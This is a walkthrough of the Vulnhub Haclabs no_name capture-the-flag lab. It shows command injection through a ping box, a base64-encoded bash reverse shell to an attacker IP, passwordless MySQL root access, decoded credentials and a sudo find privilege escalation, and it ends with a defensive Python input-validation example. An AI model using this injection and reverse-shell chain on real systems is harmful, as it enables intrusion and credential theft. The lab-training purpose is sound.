Vulnhub – Haclabs no_name Walkthrough

We start by scanning the host with nmap -A -T4 -p- 192.168.1.17 -vv

Only port 80 is open. Running dirb once found a page, index.php, with a ping box that says it is a fake ping. Running dirb again with the .php extension got a result:

The page superadmin.php has a ping box, and we run a ping with 8.8.8.8|id

We got the id of the host, so now we can get a shell back to our machine. I tried nc first but it didn't work, so I'm going to use another shell and convert it to Base64:

bash -i >& /dev/tcp/192.168.1.13/4444 0>&1

Now we convert the command into Base64 and post it with echo into the ping box:

8.8.8.8 | echo "<BASE64 CODE>" | base64 -d | bash

We open a listening port on our machine to get a reverse shell:

Then we navigate to the home directory. The first user is yash, and his flag:

The second user is haclabs and his flag is:

Running the LinEnum.sh script, we can see that we can log in to the MySQL database as root without a password:

mysql -u root

SHOW DATABASES;

USE hacklabs;

SHOW TABLES;

SELECT * FROM users;

Now we have the username yash and his password encoded as Base64. Decoding it gives the password destruction089

We log in with his credentials using su yash and then his password:

Flag1 said the password is saved in a secret place; we can find it with this command:

find / -type f -name ".*"

And yes it’s there, navigate to the location and view it:

We log in with su haclabs and the password haclabs1234. We can see that the user haclabs can use the sudo command:

Using the command sudo find . -exec /bin/sh \; -quit
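
The whole chain starts at the ping box on superadmin.php accepting 8.8.8.8|id, so the fix belongs there. As an added example (not part of the original walkthrough and not the box's own code, whose source is not shown here), this Python sketch contrasts an assumed concatenate-into-shell pattern with a hardened handler; the function names and the ping arguments are assumptions.

```python
import ipaddress
import subprocess

# Constructed inputs: a benign address plus the two ping-box values from the walkthrough.
SAMPLES = [
    "8.8.8.8",
    "8.8.8.8|id",
    '8.8.8.8 | echo "<BASE64 CODE>" | base64 -d | bash',
]


def vulnerable_command(target: str) -> str:
    """Assumed shape of the flaw: input concatenated into one shell command line.
    Returned as a string only, never executed here."""
    return "ping -c 1 " + target  # a shell would treat '|' as a pipeline separator


def safe_ping_argv(target: str) -> list:
    """Build an argv list for ping, or raise ValueError if target is not an IPv4 literal."""
    addr = ipaddress.IPv4Address(target.strip())  # rejects '|', spaces, quotes, leading '-'
    return ["ping", "-c", "1", str(addr)]


def run_ping(target: str) -> int:
    """Run ping without a shell, so no metacharacter is ever interpreted by /bin/sh."""
    argv = safe_ping_argv(target)
    return subprocess.run(argv, shell=False, timeout=5, capture_output=True).returncode


def classify(samples) -> dict:
    """Map each input to 'accepted' or 'rejected' by the hardened validator."""
    verdicts = {}
    for sample in samples:
        try:
            safe_ping_argv(sample)
            verdicts[sample] = "accepted"
        except ValueError:
            verdicts[sample] = "rejected"
    return verdicts


if __name__ == "__main__":
    for sample, verdict in classify(SAMPLES).items():
        print(f"{verdict:8} {sample!r}  shell form: {vulnerable_command(sample)!r}")
```

Validation and shell-free execution are both needed: the allow-list stops option injection through a leading dash, and the argv form keeps any future validation gap from reaching a shell.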
